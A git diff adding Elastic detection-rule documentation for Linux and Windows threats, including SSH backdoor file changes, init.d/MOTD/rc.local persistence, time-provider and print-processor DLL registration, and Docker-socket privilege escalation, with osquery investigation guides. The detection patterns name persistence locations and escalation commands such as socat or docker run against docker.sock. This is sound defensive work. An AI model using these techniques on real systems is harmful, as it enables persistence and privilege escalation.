https://github.com/eset/malware-ioc/tree/master/sshdoor +* https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Credential Access +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.type == "change" and process.executable : ("/usr/sbin/sshd", "/usr/bin/ssh") and + ( + (file.name : (".*", "~*", "*~") and not file.name : (".cache", ".viminfo", ".bash_history", ".google_authenticator", + ".jelenv", ".csvignore", ".rtreport")) or + file.extension : ("in", "out", "ini", "h", "gz", "so", "sock", "sync", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9") or + file.path : + ( + "/private/etc/*--", + "/usr/share/*", + "/usr/include/*", + "/usr/local/include/*", + "/private/tmp/*", + "/private/var/tmp/*", + "/usr/tmp/*", + "/usr/share/man/*", + "/usr/local/share/*", + "/usr/lib/*.so.*", + "/private/etc/ssh/.sshd_auth", + "/usr/bin/ssd", + "/private/var/opt/power", + "/private/etc/ssh/ssh_known_hosts", + "/private/var/html/lol", + "/private/var/log/utmp", + "/private/var/lib", + "/var/run/sshd/sshd.pid", + "/var/run/nscd/ns.pid", + "/var/run/udev/ud.pid", + "/var/run/udevd.pid" + ) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Modify Authentication Process +** ID: T1556 +** Reference URL: https://attack.mitre.org/techniques/T1556/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Compromise Client Software Binary +** ID: T1554 +** Reference URL: https://attack.mitre.org/techniques/T1554/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-init-d-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-init-d-detected.asciidoc new file mode 100644 index 0000000000..81a96edf46 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-init-d-detected.asciidoc @@ -0,0 +1,138 @@ +[[prebuilt-rule-8-10-5-potential-persistence-through-init-d-detected]] +=== Potential Persistence Through init.d Detected + +Files that are placed in the /etc/init.d/ directory in Unix can be used to start custom applications, services, scripts or commands during start-up. Init.d has been mostly replaced in favor of Systemd. However, the "systemd-sysv-generator" can convert init.d files to service unit files that run at boot. Adversaries may add or alter files located in the /etc/init.d/ directory to execute malicious code upon boot in order to gain persistence on the system. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/ +* https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#8-boot-or-logon-initialization-scripts-rc-scripts +* https://www.cyberciti.biz/faq/how-to-enable-rc-local-shell-script-on-systemd-while-booting-linux-system/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Persistence Through init.d Detected + +The `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown. + +Attackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory. + +This rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses {security-guide}/security/current/osquery-placeholder-fields.html[placeholder fields] to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run. +#### Possible Investigation Steps + +- Investigate the file that was created or modified. + - !{osquery{"label":"Osquery - Retrieve File Information","query":"SELECT * FROM file WHERE path = {{file.path}}"}} +- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered. + - !{osquery{"label":"Osquery - Retrieve File Listing Information","query":"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')"}} + - !{osquery{"label":"Osquery - Retrieve Additional File Listing Information","query":"SELECT\n f.path,\n u.username AS file_owner,\n g.groupname AS group_owner,\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\n datetime(f.btime, 'unixepoch') AS file_created_time,\n f.size AS size_bytes\nFROM\n file f\n LEFT JOIN users u ON f.uid = u.uid\n LEFT JOIN groups g ON f.gid = g.gid\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\n"}} +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations. + - !{osquery{"label":"Osquery - Retrieve Running Processes by User","query":"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username"}} +- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations. +- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. + - If scripts or executables were dropped, retrieve the files and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. + - File access, modification, and creation activities. + - Cron jobs, services and other persistence mechanisms. + - !{osquery{"label":"Osquery - Retrieve Crontab Information","query":"SELECT * FROM crontab"}} + +### False Positive Analysis + +- If this activity is related to new benign software installation activity, consider adding exceptions — preferably with a combination of user and command line conditions. +- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. +- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need. + +### Related Rules + +- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Delete the maliciously created service/init.d files or restore it to the original configuration. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type :"linux" and event.action:("creation" or "file_create_event" or "rename" or "file_rename_event") and +file.path : /etc/init.d/* and not process.name : ("dpkg" or "dockerd" or "rpm" or "dnf" or "chef-client" or "apk" or "yum" or +"rpm" or "vmis-launcher" or "exe") and not file.extension : ("swp" or "swx") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Initialization Scripts +** ID: T1037 +** Reference URL: https://attack.mitre.org/techniques/T1037/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-motd-file-creation-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-motd-file-creation-detected.asciidoc new file mode 100644 index 0000000000..02aa1a29bf --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-motd-file-creation-detected.asciidoc @@ -0,0 +1,133 @@ +[[prebuilt-rule-8-10-5-potential-persistence-through-motd-file-creation-detected]] +=== Potential Persistence Through MOTD File Creation Detected + +Message of the day (MOTD) is the message that is presented to the user when a user connects to a Linux server via SSH or a serial connection. Linux systems contain several default MOTD files located in the "/etc/update-motd.d/" and "/usr/lib/update-notifier/" directories. These scripts run as the root user every time a user connects over SSH or a serial connection. Adversaries may create malicious MOTD files that grant them persistence onto the target every time a user connects to the system by executing a backdoor script or command. This rule detects the creation of potentially malicious files within the default MOTD file directories. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Persistence Through MOTD File Creation Detected + +The message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux. + +Attackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges. + +This rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses {security-guide}/security/current/osquery-placeholder-fields.html[placeholder fields] to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run. + +#### Possible Investigation Steps + +- Investigate the file that was created or modified. + - !{osquery{"label":"Osquery - Retrieve File Information","query":"SELECT * FROM file WHERE path = {{file.path}}"}} +- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered. + - !{osquery{"label":"Osquery - Retrieve File Listing Information","query":"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')"}} + - !{osquery{"label":"Osquery - Retrieve Additional File Listing Information","query":"SELECT\n f.path,\n u.username AS file_owner,\n g.groupname AS group_owner,\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\n datetime(f.btime, 'unixepoch') AS file_created_time,\n f.size AS size_bytes\nFROM\n file f\n LEFT JOIN users u ON f.uid = u.uid\n LEFT JOIN groups g ON f.gid = g.gid\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\n"}} +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations. + - !{osquery{"label":"Osquery - Retrieve Running Processes by User","query":"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username"}} +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system. + - If scripts or executables were dropped, retrieve the files and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. + - File access, modification, and creation activities. + - Cron jobs, services and other persistence mechanisms. + - !{osquery{"label":"Osquery - Retrieve Crontab Information","query":"SELECT * FROM crontab"}} + +### Related Rules + +- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447 + +### False positive analysis + +- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Delete the MOTD files or restore their original configuration. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type :"linux" and event.action:("creation" or "file_create_event" or "rename" or "file_rename_event") and +file.path : (/etc/update-motd.d/* or /usr/lib/update-notifier/*) and not process.name : ( + dpkg or dockerd or rpm or executor or dnf +) and not file.extension : ("swp" or "swpx") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Initialization Scripts +** ID: T1037 +** Reference URL: https://attack.mitre.org/techniques/T1037/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-run-control-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-run-control-detected.asciidoc new file mode 100644 index 0000000000..113dc9f2cd --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-run-control-detected.asciidoc @@ -0,0 +1,141 @@ +[[prebuilt-rule-8-10-5-potential-persistence-through-run-control-detected]] +=== Potential Persistence Through Run Control Detected + +This rule monitors the creation/alteration of the rc.local file by a previously unknown process executable through the use of the new terms rule type. The /etc/rc.local file is used to start custom applications, services, scripts or commands during start-up. The rc.local file has mostly been replaced by Systemd. However, through the "systemd-rc-local-generator", rc.local files can be converted to services that run at boot. Adversaries may alter rc.local to execute malicious code at start-up, and gain persistence onto the system. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/ +* https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#8-boot-or-logon-initialization-scripts-rc-scripts +* https://www.cyberciti.biz/faq/how-to-enable-rc-local-shell-script-on-systemd-while-booting-linux-system/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Persistence Through Run Control Detected + +The `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution. + +There might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital. + +Detection alerts from this rule indicate the creation of a new `/etc/rc.local` file. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses {security-guide}/security/current/osquery-placeholder-fields.html[placeholder fields] to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run. + +#### Possible Investigation Steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Investigate the file that was created or modified. + - !{osquery{"label":"Osquery - Retrieve File Information","query":"SELECT * FROM file WHERE path = {{file.path}}"}} +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations. + - !{osquery{"label":"Osquery - Retrieve Running Processes by User","query":"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username"}} +- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`. + - !{osquery{"label":"Osquery - Retrieve rc-local.service File Information","query":"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')"}} + - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file. + - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep "rc-local.service|/etc/rc.local Compatibility"` can be executed to check for the execution of the service. + - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations. +- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. + - If scripts or executables were dropped, retrieve the files and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. + - File access, modification, and creation activities. + - Cron jobs, services and other persistence mechanisms. + - !{osquery{"label":"Osquery - Retrieve Crontab Information","query":"SELECT * FROM crontab"}} + +### False Positive Analysis + +- If this activity is related to new benign software installation activity, consider adding exceptions — preferably with a combination of user and command line conditions. +- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account. +- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need. + +### Response and remediation +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Delete the `service/rc.local` files or restore their original configuration. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type : "linux" and event.category : "file" and +event.type : ("change" or "file_modify_event" or "creation" or "file_create_event") and +file.path : "/etc/rc.local" and not process.name : ( + "dockerd" or "docker" or "dnf" or "dnf-automatic" or "yum" or "rpm" or "dpkg" +) and not file.extension : ("swp" or "swpx") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Initialization Scripts +** ID: T1037 +** Reference URL: https://attack.mitre.org/techniques/T1037/ +* Sub-technique: +** Name: RC Scripts +** ID: T1037.004 +** Reference URL: https://attack.mitre.org/techniques/T1037/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-via-time-provider-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-via-time-provider-modification.asciidoc new file mode 100644 index 0000000000..8b200f2c67 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-via-time-provider-modification.asciidoc @@ -0,0 +1,85 @@ +[[prebuilt-rule-8-10-5-potential-persistence-via-time-provider-modification]] +=== Potential Persistence via Time Provider Modification + +Identifies modification of the Time Provider. Adversaries may establish persistence by registering and enabling a malicious DLL as a time provider. Windows uses the time provider architecture to obtain accurate time stamps from other network devices or clients in the network. Time providers are implemented in the form of a DLL file which resides in the System32 folder. The service W32Time initiates during the startup of Windows and loads w32time.dll. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://pentestlab.blog/2019/10/22/persistence-time-providers/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type:"change" and + registry.path: ( + "HKLM\\SYSTEM\\*ControlSet*\\Services\\W32Time\\TimeProviders\\*", + "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Services\\W32Time\\TimeProviders\\*" + ) and + registry.data.strings:"*.dll" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Time Providers +** ID: T1547.003 +** Reference URL: https://attack.mitre.org/techniques/T1547/003/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Time Providers +** ID: T1547.003 +** Reference URL: https://attack.mitre.org/techniques/T1547/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-port-monitor-or-print-processor-registration-abuse.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-port-monitor-or-print-processor-registration-abuse.asciidoc new file mode 100644 index 0000000000..3b9e4c28cc --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-port-monitor-or-print-processor-registration-abuse.asciidoc @@ -0,0 +1,95 @@ +[[prebuilt-rule-8-10-5-potential-port-monitor-or-print-processor-registration-abuse]] +=== Potential Port Monitor or Print Processor Registration Abuse + +Identifies port monitor and print processor registry modifications. Adversaries may abuse port monitor and print processors to run malicious DLLs during system boot that will be executed as SYSTEM for privilege escalation and/or persistence, if permissions allow writing a fully-qualified pathname for that DLL. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type in ("creation", "change") and + registry.path : ( + "HKLM\\SYSTEM\\*ControlSet*\\Control\\Print\\Monitors\\*", + "HKLM\\SYSTEM\\*ControlSet*\\Control\\Print\\Environments\\Windows*\\Print Processors\\*", + "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Control\\Print\\Monitors\\*", + "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Control\\Print\\Environments\\Windows*\\Print Processors\\*" + ) and registry.data.strings : "*.dll" and + /* exclude SYSTEM SID - look for changes by non-SYSTEM user */ + not user.id : "S-1-5-18" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Port Monitors +** ID: T1547.010 +** Reference URL: https://attack.mitre.org/techniques/T1547/010/ +* Sub-technique: +** Name: Print Processors +** ID: T1547.012 +** Reference URL: https://attack.mitre.org/techniques/T1547/012/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Port Monitors +** ID: T1547.010 +** Reference URL: https://attack.mitre.org/techniques/T1547/010/ +* Sub-technique: +** Name: Print Processors +** ID: T1547.012 +** Reference URL: https://attack.mitre.org/techniques/T1547/012/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-through-writable-docker-socket.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-through-writable-docker-socket.asciidoc new file mode 100644 index 0000000000..d34a367e2f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-through-writable-docker-socket.asciidoc @@ -0,0 +1,67 @@ +[[prebuilt-rule-8-10-5-potential-privilege-escalation-through-writable-docker-socket]] +=== Potential Privilege Escalation through Writable Docker Socket + +This rule monitors for the usage of Docker runtime sockets to escalate privileges on Linux systems. Docker sockets by default are only be writable by the root user and docker group. Attackers that have permissions to write to these sockets may be able to create and run a container that allows them to escalate privileges and gain further access onto the host file system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation#automatic-enumeration-and-escape + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Domain: Container +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and +( + (process.name == "docker" and process.args : "run" and process.args : "-it" and + process.args : ("unix://*/docker.sock", "unix://*/dockershim.sock")) or + (process.name == "socat" and process.args : ("UNIX-CONNECT:*/docker.sock", "UNIX-CONNECT:*/dockershim.sock")) +) and not user.Ext.real.id : "0" and not group.Ext.real.id : "0" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: 